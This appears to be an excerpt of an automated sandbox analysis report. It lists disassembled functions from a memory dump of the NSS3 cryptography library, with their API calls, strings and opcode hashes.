PL_NewHashTable.NSS3(00000000,6C73FE80,6C73FD30,6C78C350,00000000,00000000,00000001,00000000,6C830148,?,6C6F6FEC), ref: 6C6E5055
PL_NewHashTable.NSS3(00000000,6C73FE80,6C73FD30,6C78C350,00000000,00000000,?,00000001,00000000,6C830148,?,6C6F6FEC), ref: 6C6E506D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: daac86f6ac14ec2be65c74c638c8ae2737f08b51f5f9c970e67540500abc5bc2
Instruction ID: 2b34652459cb38f4a03cf6679be6d2257822e845030b4f7fa175231b15d48968
Opcode Fuzzy Hash: daac86f6ac14ec2be65c74c638c8ae2737f08b51f5f9c970e67540500abc5bc2
Instruction Fuzzy Hash: AB3184B1B0F220DBDB20AA65884CB4737B8AB1776CF158136EA05C7A41E379A504CBE5

Function 6C682E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C682F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C682FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C683005
memcpy.VCRUNTIME140(?,?,?), ref: 6C6830EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C683131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C683178

Strings

database corruption, xrefs: 6C68316C
%s at line %d of [%.10s], xrefs: 6C683171
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C683022, 6C683156, 6C683162, 6C68318A, 6C683196, 6C6831A2, 6C6831AE, 6C6831BA, 6C6831C6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 5990f355a1f584ce3f4f297b00989755e09eb02af020b0bf9679dcc76281b313
Instruction ID: ed04ae237013bf4e405c3b1d3f3de3db712b97eb7f7b7b528b228cacd25d64b8
Opcode Fuzzy Hash: 5990f355a1f584ce3f4f297b00989755e09eb02af020b0bf9679dcc76281b313
Instruction Fuzzy Hash: 17B1A2B0E062199BCB18CF9DC885AEEB7B1BF48704F144429E945B7B41D7749942CBB8

Function 6C757F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C757FB2

Part of subcall function 6C6DBA40: TlsGetValue.KERNEL32 ref: 6C6DBA51
Part of subcall function 6C6DBA40: TlsGetValue.KERNEL32 ref: 6C6DBA6B
Part of subcall function 6C6DBA40: EnterCriticalSection.KERNEL32 ref: 6C6DBA83
Part of subcall function 6C6DBA40: TlsGetValue.KERNEL32 ref: 6C6DBAA1
Part of subcall function 6C6DBA40: _PR_MD_UNLOCK.NSS3 ref: 6C6DBAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C757FD4

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

Part of subcall function 6C759430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C759466

PR_ExitMonitor.NSS3(?), ref: 6C75801B
PR_EnterMonitor.NSS3(?), ref: 6C758034
TlsGetValue.KERNEL32 ref: 6C7580A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7580C0
PR_ExitMonitor.NSS3(?), ref: 6C75811C
PR_ExitMonitor.NSS3(?), ref: 6C758134

Strings

), xrefs: 6C7580DB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 0c530eccde85e999babb9ef264c6552196944a919add192fe82be883a1c1a95e
Instruction ID: 760dfccd0258e26177c72c2d0d9f03d1f7cf58e582e8185ec9f950e877292b1d
Opcode Fuzzy Hash: 0c530eccde85e999babb9ef264c6552196944a919add192fe82be883a1c1a95e
Instruction Fuzzy Hash: 8E517B71A503048BEB209F34DE097EB77B0AF5234CF84453DDD5946A42EF32A929C792

Function 6C6FFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C6FFCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C6FFCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C6FFCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6FFD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C6FFD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C6FFD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C6FFD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6FFD84

Strings

:, xrefs: 6C6FFD78

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 22bb6810d97e9dd563643ad6f65ea047f89903040ed86dc2ec3a41915bdaa92f
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: C131B1B29002155BEB008AA49D497AF77EAEF54358F150124DC24A7B00E772E91AC7E7

Function 6C716C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C716C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C716C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C716CA3

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C716CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C716CD5

Strings

pMechanism = 0x%p, xrefs: 6C716CD0
C_DigestInit, xrefs: 6C716C61
(CK_INVALID_HANDLE), xrefs: 6C716C9C
hSession = 0x%x, xrefs: 6C716C7E, 6C716C8E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 8d85aea3e4fed34c5e21cd24e6fbd30cc27f538210a699dc75181e90990cfa7f
Instruction ID: ec0c1827700038e966ffa70b37987e1c87c24e373ac1114bc581d97fb35c3718
Opcode Fuzzy Hash: 8d85aea3e4fed34c5e21cd24e6fbd30cc27f538210a699dc75181e90990cfa7f
Instruction Fuzzy Hash: C721F530A091049BDB20AF559F8DB9A37B5EB4221DF088435E819D7F01DB34AA09CBD6

Function 6C719DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6C719DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C719E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C719E33

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C719E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C719E65

Strings

(CK_INVALID_HANDLE), xrefs: 6C719E2C
C_SessionCancel, xrefs: 6C719DF1
hSession = 0x%x, xrefs: 6C719E0E, 6C719E1E
flags = 0x%x, xrefs: 6C719E60

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
API String ID: 1003633598-1678415578
Opcode ID: a6aba7d4290d8067aa58c445a5b750eb51d320d23d206ac688ba69d42f1ff661
Instruction ID: 95fabb54bfae46cd3951aa8972f2fba43ef251d652daa4c073044ac2a6363316
Opcode Fuzzy Hash: a6aba7d4290d8067aa58c445a5b750eb51d320d23d206ac688ba69d42f1ff661
Instruction Fuzzy Hash: 9A21E47260A104AFD720AB54DE8DB6A37B9EB5270DF088434E80997B11DB34A84EC7D2

Function 6C6E0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6E0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6E0F84

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C6FF59B,6C80890C,?), ref: 6C6E0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C6E0FC1

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C6E0FDB
PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6E0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C6E1001
PL_FinishArenaPool.NSS3(?), ref: 6C6E1009

Strings

security, xrefs: 6C6E0F5C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 6f7f84214789cbfa5255c4c19f66aff7c88485f9a76e3ebcb1b8f2fcca22f166
Instruction ID: 7735fd3bd1a07279532ef8dcfc15bbe2104a27e81d6f7b17e9c6860ea97ed6b8
Opcode Fuzzy Hash: 6f7f84214789cbfa5255c4c19f66aff7c88485f9a76e3ebcb1b8f2fcca22f166
Instruction Fuzzy Hash: 4F21E371904204ABE7109F24DE48AAB77A4EF4575CF008929EC1897702FB31A65ADBD2

Function 6C6E6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C6E7D8F,6C6E7D8F,?,?), ref: 6C6E6DC8

Part of subcall function 6C73FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C73FE08
Part of subcall function 6C73FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C73FE1D
Part of subcall function 6C73FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C73FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C6E7D8F,?,?), ref: 6C6E6DD5

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C808FA0,00000000,?,?,?,?,6C6E7D8F,?,?), ref: 6C6E6DF7

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6E6E35

Part of subcall function 6C73FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C73FE29
Part of subcall function 6C73FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C73FE3D
Part of subcall function 6C73FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C73FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C6E6E4C

Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C808FE0,00000000), ref: 6C6E6E82

Part of subcall function 6C6E6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C6EB21D,00000000,00000000,6C6EB219,?,6C6E6BFB,00000000,?,00000000,00000000,?,?,?,6C6EB21D), ref: 6C6E6B01
Part of subcall function 6C6E6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C6E6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6E6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C6E6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C808FE0,00000000), ref: 6C6E6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C6E7D8F,?,?), ref: 6C6E6FE1

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 25fae9a772370e9b2687b19ef69f4fe44d34639c54c3ea79c86ed907991c9877
Instruction ID: 5c95d2de86aaad564cac5a888fe0230a59b5277a3f52c8a0b76c0a817ed05972
Opcode Fuzzy Hash: 25fae9a772370e9b2687b19ef69f4fe44d34639c54c3ea79c86ed907991c9877
Instruction Fuzzy Hash: A171E471D1564A9FDB00CF15CE44BAA7BA5FF58308F15422AE908D7B12F730EA94CB94

Function 6C720FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C721057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C721085
PK11_GetAllTokens.NSS3 ref: 6C7210B1
free.MOZGLUE(?), ref: 6C721107
PR_SetError.NSS3(00000000,00000000), ref: 6C721172
free.MOZGLUE(?), ref: 6C721182
free.MOZGLUE(?), ref: 6C7211A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7211C5

Part of subcall function 6C7252C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C6FEAC5,00000001), ref: 6C7252DF
Part of subcall function 6C7252C0: EnterCriticalSection.KERNEL32(?), ref: 6C7252F3
Part of subcall function 6C7252C0: PR_Unlock.NSS3(?), ref: 6C725358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7211D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7211F3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 4ae5fc78b568689be8b58adc9f31867f6e8716dacb09c5e3fbb3b694c783590a
Instruction ID: 55858905f0921cf1877f939605bb20491f1473d2748ce948d93c6f590a5059a8
Opcode Fuzzy Hash: 4ae5fc78b568689be8b58adc9f31867f6e8716dacb09c5e3fbb3b694c783590a
Instruction Fuzzy Hash: 8D61A4B0E003459BEB10DFA4DA85BAAB7B5BF04348F144138ED19AB741E736ED45CBA1

Function 6C72ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE10
EnterCriticalSection.KERNEL32(?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C70D079,00000000,00000001), ref: 6C72AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AE7F
TlsGetValue.KERNEL32(?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AEF1
free.MOZGLUE(6C70CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C70CDBB,?), ref: 6C72AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C70CDBB,?,6C70D079,00000000,00000001), ref: 6C72AF30

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 41774495d15dcf7635906c93c7cbe07b02eb0e7788f1aaed17b9e9b3872f2388
Instruction ID: d6d5194b6d2295b5bd46bd6f8fe0d63c2e4fadf0671e96c95e02e68246fab9b4
Opcode Fuzzy Hash: 41774495d15dcf7635906c93c7cbe07b02eb0e7788f1aaed17b9e9b3872f2388
Instruction Fuzzy Hash: D9519DB1E00602AFDB20DF25D989A5AB7B4FF04328F144675E81897A12E739E865CBD1

Function 6C704CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C70AB7F,?,00000000,?), ref: 6C704CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C70AB7F,?,00000000,?), ref: 6C704CC8
TlsGetValue.KERNEL32(?,6C70AB7F,?,00000000,?), ref: 6C704CE0
EnterCriticalSection.KERNEL32(?,?,6C70AB7F,?,00000000,?), ref: 6C704CF4
PL_HashTableLookup.NSS3(?,?,?,6C70AB7F,?,00000000,?), ref: 6C704D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C704D10

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C704D26

Part of subcall function 6C7A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DC6
Part of subcall function 6C7A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DD1
Part of subcall function 6C7A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7A9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C704D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C704DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C704E02

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: bd26511218d7aa12df388f3ddacb9776d6e1cf4fdc0091087023b8d85834e60e
Instruction ID: 598e2e611d1688edb2178930d0b3b24aab6b6ac76e7d44b1ca74c725fb8cb8be
Opcode Fuzzy Hash: bd26511218d7aa12df388f3ddacb9776d6e1cf4fdc0091087023b8d85834e60e
Instruction Fuzzy Hash: 1441F7F5A00201ABEB10AF28ED4595A77F9BF1621CF054171ED1887B12FB31E925CBE5

Function 6C6EBFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6EBFFB

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
